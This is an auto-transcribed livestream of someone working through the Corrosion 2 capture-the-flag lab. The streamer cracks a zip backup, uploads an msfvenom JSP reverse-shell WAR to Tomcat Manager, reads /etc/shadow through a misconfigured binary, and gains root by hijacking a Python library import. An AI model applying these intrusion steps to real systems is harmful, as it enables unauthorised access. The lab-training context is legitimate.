Alright, back with Corrosion 2, port 22 and port 80 are up so far. So let's go ahead and check out this guy like right here. Let's go ahead and start up a map scan on TAC B80 for the IP address like right there. And we will also do a NICTO, I guess. And we can also do a... Okay, just came back a little quick, that's all. Okay, so Apache 2.4.1, we can search exploit that. Or 0.41. Nothing, okay. And there so far, well, nothing directly for that one, like right there. Are these the same as you currently use or have been updated? So I've updated mine, but the scripts one is pretty much the same. It's pretty close. There's a few updates on mine, but nothing crazy. Like literally just like maybe one or two more like things that are already scripts already made for them, but you know, just kind of NICTO, would you like to submit this information? No. I've never actually seen a NICTO scan finish. Wow, I've never seen one finish. But yeah, nothing like crazy in there that like, you know, like it's gonna change like all your notes or anything like that. Like I think the other day I put in there a Perl reverse shell because I had to use one of those the other day, a Perl reverse shell for a hack the box one. Server status, okay, nothing really crazy so far. All right, let's go ahead and check out that 43, right? 22 and 80. That's it. Let's go and check out that port 80 then. Okay, so we do have a default Ubuntu page. Fearox Buster found nothing except for server status, and that's it. And that's pretty much it. Don't really know what else to run here. There's nothing for mmap, search exploit. Apache. We got 2.4.41. Nothing in this guy like right here. Right, text or something like that? Is there a gun zip or is there a anything crazy like that in there? UDP ports. That's a good point. Check out UDP ports like real quick. Server status. All you have is a server status, huh? And that's a 403. Port 80. Is that it? That's all we have? I don't think we want to do all ports, right? We can just do something like that, can't we? Or you can say like top UDP ports or whatever it is, right? No, not all ports. You say like top. I forgot what it was. I forgot to do the top UDP ports on that map. Top ports. It's just top ports, that's it. Hey, HippoFit, thank you very much for the subscription. Thank you very much. Is that on that might have been on YouTube. I feel like that was on YouTube. Thank you for the YouTube subscription. mmap, TAC top ports, TAC SU for this IP address. right here. No, not top ports. I want to do UDP ports. Forgot how to do it. And map UDP ports. Let's do that, like right there. Attack SU flag, yep. We know that one. There's one's like top, maybe it's just top UDP ports. What did he run? Attack SU. Okay, he just ran just attack SU. Okay, let's try that. We're not getting anything else over here. Rust scan showed nothing. For 43, right? Rust scan shows nothing. However, since it is VulnHub, I can actually see like the box in here, you know. I have a J Randy and also one of the users called Tomcat. So I can actually see that box like right there. So that's kind of what I'm confused about. So I keep running Rust scan because I feel like we should have a Tomcat thing in here, which would be on port 8080. But that doesn't seem to be on. So I have no idea where they're coming up with this, like right here. Or that Tomcat user. Like right there. So yeah, I'm pretty confused. Either that or the box did not download correctly. This is Corrosion 2 according to VulnHub, and I feel like it just did not. I'm going to go ahead and restart it. We're going to turn it off. Power off the machine. Okay. We're going to turn it back on again. So I feel like it just did not run correctly or start up correctly. Let's go ahead and start up again. Corrosion 2, starting it back up. If there's a Tomcat server on it, then we have our way in, really, you know. Starting up now. So I want to see if it can see it yet. It can. Okay. Let's go ahead and run Rust scan again. Okay. Why do you have a Tomcat user then? That's what I'm not understanding, like right there. Should try to log into it. I don't know. Seems like something's wrong. Okay. So it didn't log into it. It gave me a wrong password, and now I have port 8080s up. Okay, cool. All right, let's go ahead and run a Furox Buster on that, like real quick, just to make sure. We'll do TechX PHP and maybe text and zip. There's a Tomcat server, right? So maybe something like that. And we'll run this on 43. We probably actually turn up that TAC T 200. Probably turn it up to like 500 or something, huh? Since it is directly connected to me. There we go. Now we're freaking cooking with oil here. Let's make sure it is a Tomcat server. So that's what one of the usernames were. Okay, so it is a Tomcat server. Okay, we can log in also. Admin, enter, cancel. Let's go ahead and see if it actually gives it to us. Tomcat secret. We can try that like right there. Tomcat secret. Nope. Okay, so we're not getting in with the default credentials. Like right now. We got this guy running like right now. Let's go ahead and see if we can find anything in there, and we'll go from there and really see, because we didn't find anything before at all. We just found server stats for. Am I on port 8080? No, I'm not. Okay, that's great. Good job, Ryan. Great work. You did excellent. 8080. There we go. Okay, we can go ahead and exit out of here. Docs, images, that's all pretty normal. Holy crap. Holy crap. Okay, see if we see anything in here so far. Oh my god. Okay. Docs, images, examples. This is all pretty normal stuff. That is not normal. Backup.zip is not normal. Okay, so it's just automatically downloaded. That's great. This is called Corrosion, right? 2. And we'll go ahead and we will move from downloads backup.zip to right here. And let's go ahead and unzip backup.zip. We need a password. Let's go ahead and use aircrack. I suck with aircrack. Wish they would just give you a little thing like that. I think I actually made notes for it because I always forget what to do with aircrack. I did. Gamma Jesus. aircrack zip UDP. Oh, okay. Should probably remember that. aircrack zip tag UD, and then it was lowercase p, correct? Yep. Tag P, and we want to use our word list of rocky.txt, and that's going to be on backup.zip, right? Let's go. Alright, so we got a password now. So let's go ahead and unzip backup.zip. We got our password like right here. Let's go ahead and do a little, ooh, okay. A lot of stuff in there. Alright, let's go ahead and do a echo that into zip pass.txt. So we have that right. And we have all this stuff now also. So let's go ahead and attack LA. So we have all this crap now, right? I believe we want Tomcat users. Alright, admin password is that. Okay. Well, that was easy. Way easier than I thought it was going to be. Okay. Did not see that coming. Is that for that? Let's also see if they reuse credentials or something like that, you know? Hey, thanks a lot for the follow. Ooh, I can't read that. Oh God, I can't read it. Oh God. I don't know. I don't know. It just went away too. Gonna read your name. What was it? So bad at this. Well, thank you very much for the follow. Somebody followed. Thank you. Alright, so we're in Tomcat now. So now we can go ahead and we can exploit Tomcat, which I should have, since I don't really do this too much with Tomcat. I should be able to go to web. I believe I have Tomcat in here. Do I? Or am I going to have to try to go off of memory for this thing? I'm going to have to try to go off of memory for it. That's what I like to see. Great. Okay. Looking like I'm going off of memory for this guy, huh? I always forget how to do Tomcat. Okay. Here we go, boss. We're going to make a add node. Tomcat. You should go inside of there, though. Thank you. Okay. Let's go ahead and do a reverse shell Tomcat. I know there's like 1,000 things online for it. Apache Tomcat Manager, war. Yeah, .war files, what it is. So you go ahead and make a .war file. We need to upload that. So, oh, they're doing it. Do Metasploit and everything. Set our host. Oh, they're doing Tomcat Manager upload. But we just want to make a .war file, right? Yeah, MSF Venom, something like that, like right there. So something just like this guy right here. You actually just copy that right here. Boom, boom. And we're actually just going to make one over here. I have to configure like real quick. We'll do an MSF Venom. Attack P. What was that again now? Java, that's what it is. Java JSP shell reverse TCP lhost is going to be lhost is going to equal. Oh, you can stop now. 192.168.0.29. Okay, L port equal 53, and tag F is going to be a war file. We'll call that rshell.war. It's pretty much the same thing, just, you know, changing our IP addresses there. Let's go. Okay, let's go ahead and throw that up here. Save that, and we'll go ahead and we'll throw that NC tag LVMP 53. Right. From here, we'll go ahead and we will upload that into our Tomcat web server. So let's go ahead and browse for our war file, and we are on VulnHub, right? Corrosion, and we have our rshell.war. All right. Okay. We do have our listener up and running, right? Have that up and running. We got our war file ready to go. Let's go ahead and deploy that. And then we just got to click on it, right? We should have to click on our shell, and we should get a reverse shell, correct? And we do. Okay. Cool. Which Python 3. Okay, cool. Cat scripts full shell. Go ahead and grab our Python 3 full shell here. Okay. Then we'll do a Control Z, STTY TAC A, STTY raw, export term equals xterm, STTY rows. Rows is going to be 18, and columns is going to be 71. Cool. Let's go in cat/etc password first, and we will grep for bin bash, see who's actually on this machine. And we have a Randy, can actually, okay, so it's cd and /home, and we have JN Randy, okay, we can actually read, that's weird, cd and Randy, we can do more on Randy, okay, there's our user.txt, cool, nothing on here that we can do like right there. We have note.txt, we have a random base 64 pi.txt, we got a lot of stuff in here. Hey Randy, this is your system administrator, hope you're having a great day. I am. Thank you. I just want to let you know that I changed your permissions for your home directory. You won't be able to remove or add files for now. Okay. It's kind of a dick move, but alright. Let's see what this is all about. Import base 64. Message input, enter your string. Is it like echo back to me? No, it's going to print it out. Doesn't seem too dangerous, I don't think. If it's just printing, it's not like echoing back to me, right? That's not going to be anything too crazy, right? Let's see here. Now we just need to figure out what can we actually do here. Let's go ahead and instead of trying to figure out, let's go ahead and let someone else figure out for us. Can we actually look at SUID bits like real quick? Let's look at SUID bits and do a sudo tackl just in case. Don't know what Tomcat's password is. Can we do a cat scripts SUID lookup? Might be actually be able to find Tomcat's password though. Okay, let's see what we got here so far. Mount, ping, unmount. No. Password, no. Password, VMware, PXExec. I don't think I can do anything with that. I think I've seen it before. I don't think I can do anything with it with. I think that's only going to be with sudo capabilities, but we try it. No, okay. Nothing with PSDI. Okay. Yeah, nothing crazy in here. Go on and grab limpies. Why is it on 8,000? Oh. That's why. And change mode plus X for limpies. And we'll go ahead and we'll try to run limpies. See what we get here. See if we get anything so far. Sudo version is old. Might be able to do some of that, but this might also just be an old box, so don't want to go too hardcore with that just yet. But we could always do something with that. Could do a hack me a sandwich, right? I don't have hacks me a sandwich in here. I feel like I do. Oh, it's in my script. Okay. This guy seems to be taking a minute now, doesn't he? Okay. Yeah, he's kind of stuck. Hopefully he's not frozen. Oh, there we go. Okay, never mind. We got a bunch of stuff just came through. I usually just scan it first, looking for some red and yellow or red and gold, whatever you want to call it, and then I go back through and actually kind of read it like a little more. Tomcat. What is this? Var backups home.tdg. You can run a backup of our user accounts at 5 a.m. Okay. It's kind of strange. We also had Tomcat. Don't know how much we'll actually be able to do with that, because we are already the user Tomcat. GDB. Okay. Logs, everything back up. Nothing. Huh? The file needs this password, okay? Huh. That's really strange. Okay, so I couldn't really see anything in there. I don't know. What is that password though? I have a password for some reason. It just says the file needs this password though. What else we got in here? Oh, I could read batch history. Oh, something in there, okay. Desktop document downloads. Probably should go into desktop real quick too, huh? Okay. Okay, so nothing in those ones. Okay, so nothing. All right, so far we're getting absolutely nowhere. All right, let's see if we got some password reuse here. That was down like right there. I didn't see any other passwords so far, right? I didn't find any other passwords, right? So, where can I go? I did see another password. Right there. Who's the admin? The only one that we can't look at is J, so can we... Okay, cool. Okay, cool. So he used the admin GUI was the same one. So yeah, password reuse. Always check password reuse. Okay. Wonder if he can SSH in. Make my life a little bit easier. Of course. So we got 192.168.0.43. Can you get in like this, Jay? I don't think you can, because then we already look at Etsy password and we couldn't do it. Let's go ahead and try. Or Etsy, yeah, Etsy password. Okay, so, okay. Yeah, we can. We still have a shit fucking thing, though. Yeah, we still have a crap. Kind of in the same boat that we've been in. Python 3, right? Yeah, okay. Okay, so let's go ahead and grab that Python 3. And we'll go ahead and we'll do everything that we did a second ago. Oh, I can't put that in the background, can I? Can't put that one in the background either. Cool. Okay, but we got a much better thing over here. Never mind. Okay, so we can go ahead and exit out here. Exit. Exit. Okay, because we do have his password now, so we can go ahead and actually echo J, and then his password right there, which that's not it. His password is not a full shell. Okay. I'm going to use pass.text, and we can go ahead and do sudo tag L, I guess. He may not run sudo. Okay, that's good. What does he have in his thing? So we got desktop. He can also do bash history. Nothing in it though. CD or ls tech la desktop. Documents. We have a files in there also. I don't know if you guys saw that or not. Right underneath downloads there. I was scrolling down thing. Files. Look. Is this allowing me to, like, is this going to allow me, let's look at thing, okay. Look, display lines beginning with a given string. Look, string options. Is this going to allow me to be able to actually, like, look at a file? Like, can I look at something? And then string. I don't want to find, I don't care about character, do I? I just want string. Or just a file. Okay, cool. Or Etsy shadow. Okay, cool. So we can use look. All right, let's go ahead and do let's put this into Linux like real quick. Never seen that one before. Okay, so we have root's password sitting there. I wonder if we can crack it. Let's try to crack root's password real quick. Let's go ahead and do an echo nano hash.text. And we got that one. We also have Tomcats like right here. We can try to crack that one. Might as well just try to crack them all, huh? Okay, and we also have J's like right here, which we already have. Right, and Randy's. Let's go ahead and try to crack Randy's also. I don't remember if Randy can run sudo or not, but we never became Randy yet, so let's go ahead and try to crack those three. What is it? SHA-1? Or is it like raw SHA-1 or something like that? I don't know. I don't know what the thing would be. What type of passwords are those again? Should be like 512 or something like that, right? Alright, that looks a little bit better. At least he's trying this time. Let's see what type of passwords these are. I don't remember. Look in here. That's your ID? Yeah, it is. Yeah, we can look at the file. So we can look at your password. We're going to try and crack some passwords here. Hopefully we can do something with this, huh? And let's go ahead and look up SHA-512 password. SHA-256 or SHA-512. Let's go ahead and go with 256 then. Okay. Okay, so it's definitely a SHA-512. Fork. Let's use some more CPU cores for it and let's see what happens. Why not cat the root flag? I mean, we could, if we know what it is. It's like slash root.txt or flag.txt. But for something like this, I feel like that'd be way too easy. You know? Hey, Lukey Smokes Hash, how you doing? Thank you for the follow. I think we're getting there, I feel like. I don't know. I don't want to stop it again. But it seems it's going to take 9 damn hours. I might have to use Hashcat for this one, huh? I might have to bring it back to my Windows machine and use some Hashcat for it. I'm going to leave that guy going. I'm going to grab that hash.txt file because I have not done Hashcat on my Windows machine in a very long time. So while that guy's running, I'm just going to go ahead and just set it up. And now I remember where Hashcat even is on here. If I even still have it on here. I feel like I do, but who knows. No, let's go see. So we'll leave that guy going for now. I know it's very exciting to watch. And then what we're also going to need is, what's it called? Hashcat. $6 $. SHA-512 crypt. So that's 1800. I'm gonna go with, okay, it's not a stage. Okay, so 1800. Okay. Go ahead and try it on here because I've not used it on Windows in a very long time. So I'm just gonna go ahead and try it, and then I'll show it to you guys here. What is it? 1800, 18,000. 1800. I still need to copy that hash over too. I'm going to do a Did you crack it yet? We got anything? No, not yet. No, silly goose. No. Semicolons are missing? What do you mean? What's the very end there? Shouldn't need that semicolon. Yeah, you don't have the semicolon at the beginning or the end. Semicolon shouldn't be in there. See, that's why. Yeah, so Hashcat did not crack them because AMD think I'm using like right now. I'm using AMD cards. That's why I'm kind of just leaving everything over here because Hashcat doesn't always like to work with it. But just kind of hoping we get it. Yeah, it's not cracking any of them for some reason. So Hashcat doesn't seem to be cracking any of them for some odd reason. Let's go and grab a wood J and everything. I don't need the whole damn thing. At least I shouldn't. Text, yeah. Crash card file. I don't think it knows what the hell that is. Okay. Tomcat I don't care about. Let's go and grab this and this. And Jay actually don't care. Let's try to just crack Randy's. How about that? So that's the only other person that we can still get into, right, is Randy. No idea how long it's going to take either. Oh, why'd you freaking pause? No, I didn't want to do that. I just want to copy it again. Damn you. Damn you and your ways. Yeah, Hashcat's getting through the whole thing, and it's not finding anything, but it's also on unsupported version for AMD. So, might need to download a new Hashcat. And this guy's going to take 8 hours to get through the whole thing for SHA 512. And I don't know about you guys, I'm not going to wait 8 hours. That's just me, you know? But, hey. I can do that tackle one there. No hash mode matches the structure of your input hash. Okay, that's a little better. That was for Hashcat. That's all. No hash mode. What? Bullshit. You guys told me it's 1800. Where's this guy at? $6 $. SHA 512 crypt. 1800. Attack M 1800. Not what he's saying. Randy. That's the only one that's left. We can read him. I don't know what else we're... I mean, other than this, I don't really know what else we're supposed to do, like, right here. Okay. Let's try to find other stuff. I feel like that's my way up, but... Came in as Tomcat, we got to Jay. I feel like we need to get to Randy next. Past history has nothing. Nothing else in here has anything. And if we see in J, then we at least have that files. So we still had that sudo version, right? So let's go ahead and locate sandwich again. Let's go ahead and cd and slash home, Kali, scripts, root everything. So we need to put that guy, makefile, or hackc, libc, and makefile over to here. Go ahead and grab ifconfig. It did say that sudo version was out of date. So let's go ahead and try this guy right here. And we will go ahead and we will do a wget libc, okay, and makefile. And I believe we just do make, and then that's it. Actually, we could probably put make over there, huh? Change mode plus S for make. Hack me a sandwich did not get made. That's not good. So I can't do it with like a period slash make now, can I? GCC isn't on there. And I don't think I can just throw hack me a sandwich onto there. I don't think I can. Spell sandwich wrong? I did. Oh, maybe I can. Try it. No. Because we should have already gotten it. So, nope. It's not that also. This guy over here doesn't seem to be working very well. Seems like a Hashcat's trying to do its thing over here. But it's not working very well. And I'm not going to wait this many hours. I'm just not going to wait 8 hours to see if they can crack it, you know? I don't know. I feel like we're missing something here. Nobody else seems to know either. So, John usually comes up with what it is too, and my John has not been doing that lately. Maybe I should remove him and reinstall him. I don't know. Well, that's going to take a minute to remove. Well, to install it's going to take a minute. So we'll do another sudo apt install of John, because he should not be taking that long. I want to get rid of this like right here, because usually he can just figure it out. And he has not been able to lately. I don't know if this is like the new John format or something. What's going on here? Not SHA 256, so it's definitely SHA 512. But for some reason, That we just can't crack this password, and I'm just totally barking up the wrong tree here. But I don't understand why we'd have file. Can we read his SSH key? Do you even have one? Look at home randy.sh IDRSA. Nope. Authorized users, authorized keys. Nope. So nothing in there either. And he is going to take 8 hours. And Hashcat is not buying anything also. And it's freaking flying, it's not buying anything. So I really don't know what the hell is going on here. Like right now. Desktop, VulnHub, and it's Corrosion, right? 2021. So SHA-512 hash. There we go. SHA-512. Patch John do the first download source for download packet. Not compiled programs yet though. Next follows the instructions. Maybe we're having a problem with no, none of those are $6, huh? You don't have $6 even in here. Great. I don't really see what else we would actually do here. I really don't see what else we'd actually do. And I don't see why it's taking 17 years to crack it. We'll control delete here, task manager. Okay, that's not too bad. Hey, thank you very much. Oh, someone just subscribed on YouTube. Thanks a lot, Cyril, for subscribing on YouTube. I'm thinking just fucking look it up. In all honesty, I'm not doing that. Let's go ahead and just let's go ahead and do this. Let's see what happens here. Everything else so far looks just fine, except for the sudo thing, but we don't have GC anything like that. Oh, we did all that. We did all that. We did all that. We used the metasploit for that. Cool. Okay. Look at Etsy Shadow. As you're aware, we already have a password for user J. We can copy Randy's hash value and save it to a file called hash using John. Especially in this case, we try to crack that hash. In a matter of seconds, we crack the password of that. Negative. Matter of seconds, huh? And you did not do anything special with John, so what the fuck is going on with John the Ripper lately then? So supposedly, that's the password. 0705, whatever the hell else it is. So is that still in like Rocky.txt, or did that password like go away? So is that still in there? I mean, it's still in there. So why is it taking 17 years now to crack it? Even with fucking Hashcat, it's taking 17 years to crack it. Let's see. Echo that into pass.txt. Wordless is going to be pass.txt. Yeah, it cracked. I mean, it cracked it. So why is it taking 17 years to do it the other way? Start that show. Okay, let's go ahead and remove that like real quick. It's going to take 8 years using 8 CPU cores, and for some reason Hashcat doesn't seem to be able to crack it out. I'm going to go ahead and do the same thing I just did with over there. So I know you guys can't see that like right now. I just want to see if Hashcat's messed up also. This is very, very strange. Because Hashcat's not cracking it either. With TACAM 1800 for some reason. So Hashcat can't crack it and John can't crack it, but which makes you feel like it's not a SHA-512 hash. But let's go ahead and SU into Randy, I guess. I mean, but everything that we see says it's SHA-512 hash. SHA-512. So that's 100% a SHA-512 hash. So I don't know. That's very, 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 very strange. Go ahead and do a sudo tech L for Randy, I guess. Okay, so you can run that random base64.py as root. I'm going to cd into Randy. Cd into home / Randy. That's very, very, very strange. Let's go ahead and we can read and execute it. Let's go and cat that random. See if we're going to do the same thing. Import base64, and it's not calling for the whole thing. So we're going to do the same thing we actually just did. We are going to go ahead and echo or nano base64. Okay, and we'll do a bin bash again. Same thing we just did. bin bash, Control X, yes. Control X, yes. Okay, why is it acting so weird? No? Okay, for some reason he's in his home folder, isn't he? Yeah, he's in his home folder, so he should be able to write here. We don't have Vim for some reason. Okay. Let's go ahead and we'll just make a base64 over here then. Bin bash slash bin bash, and then we'll go ahead and do a Python 3 server. Oh, we already have one to use, never mind. I have config over here because I always forget my IP address, so we'll just start up another Python 3 server over here, and we'll go ahead and throw it over here. wget http slash base64. Why can't we write to this? What? Are we in our own shit here? Alright, cd into desktop. Okay, so I can do that. So let's go ahead and export path. I already forgot the command, even though we literally just did it. Export path equals slash, let's get the PWD like real quick. Export path equals that like right there. $ path, right? If we do a $ path again, we should have that like right there. Okay, cool. Base64 is in there now, right? Okay. So we should be able to do that sudo tac L again. And we should be able to run this as root sudo tac u sudo tac u root. Yeah, like right there. Enter your string. I don't care. Okay, that's very strange. So now we should just be able to do that like right there. I wonder if we can actually mess with, oh god, no, because we're going to the full path for this guy right here, aren't we? No, user bin Python 3.8. So I wonder if we can just mess with base64.py, even though it's not calling for the full path in there. I wonder if it's already looking for it in there. You know what I'm saying? So let's go ahead and cd into user bin ls-li Python 3.8. We can read it. Yep, directory is not writable. That's what I thought. Okay. Okay. We can't do anything like that in there. Oh man. Okay. So now we need to figure out, what the fuck can we do that? Okay. I really thought it was gonna be that base64 thing right there. Oh no, we're not trying to do that. We're trying to do base64, right? We can't do anything with that either. What the frick is going on? Huh. There more than one user bin. User lib Python. Let's try that one. So there's a. Okay, there we go. Let's freaking go. Okay, let's go. Okay, cool. Let's go ahead and nano that guy. There we go. See if we can nano him first off. So we should just be able to put in import OS, right? I think it is. We should just be able to do something like that. I believe I actually have notes on this. I believe I do. No, I do not. Of course not. Why would I? Okay. So if we can mess with the Python file, then we should just have to do an import OS and then just the OS system, right? Bin bash, I believe it is. Okay, so we should just be able to do something like import OS and then say os.system, right? Bin bash, is that it? I believe it's something like that, like right there. os.system is bin bash, and that should be it, like right there. Control X, yes, enter. Okay, cool. We can write that. Let's go ahead and cd/home again. Randy, I believe it was. os.la. Let's go ahead and run that random basics4.py. And we actually want to cd into desktop, I believe it is, and remove tech RF base64. Maybe. Okay, I have my own errors in there. Okay, let's go ahead and nano. Where was that at again? Whoa. Just kidding. There we go. Okay, we'll go ahead and nano that like right there. Okay. And we will continue trying to do stuff. Hey, thanks a lot for the follow, Dan CTF. Thank you very much. So we should be able to do something like that, right? OS system bin bash, I believe it is. And that should be just about it, but it's saying no. Oh, you want to why? Because I didn't run it with sudo. Do I have to run it with root? Tech u root. Do I have to run it with root? Sudo tech l. That's why. Don't know if I actually need that, but it doesn't say all, so I think I need that. Okay, now we are root. Okay. Jeez Louise, man. Okay, cool. So we did all that. Awesome. I want to go ahead and actually make a print screen of that guy right there. I'm going to say exit out of here. Yep. Okay. And I just want to show the sudo tech l real quick. We're going to call this Python import files. Okay, cool. So we got it. Now, still haven't cracked that password yet, and even Hashcat didn't crack the password, so that's really strange. So okay, and then we do a cat that guy right there. I'm just gonna say add in the following code. There we go. All right, and then run the program, right? Awesome. So we made it. We did it. Without waiting 8 hours. We did it. cd /root. os.la. And we go ahead and cat that root.txt file. Oof. Alright, that was something else like right there. I'll tell you that much. That was something else. So we did it the right way, as far as I know. Yeah, even Hashcat, even with just that one in there, couldn't do it. John could at least do it with that just that one password in there, but I guess if we did something like this, we can always do something like a cat scripts. I mean, if we were really just like, okay, we need to figure this guy out, do like a user share word list, rocky.txt, grep tech I, for Randy, right? And then put that into a file called freaking randy.txt. We can cat that randy.txt. And that should have every single thing that has Randy in it, right? Then we could try from there, right? I don't know if that's even going to give us numbers in the front of it. It doesn't look like it now, does it? Should, shouldn't it? I feel like it should. We'll try it. So we would do something like that, and then we would do a John Randy, right? Yeah, test.text. And this one would be Randy, like right here, right? And he found that time pretty quickly without really having to do much. So what am I using to take a screenshot? I'm using Flame Shot to take a screenshot. Alright, so that is 2 of them done today. That's going to be about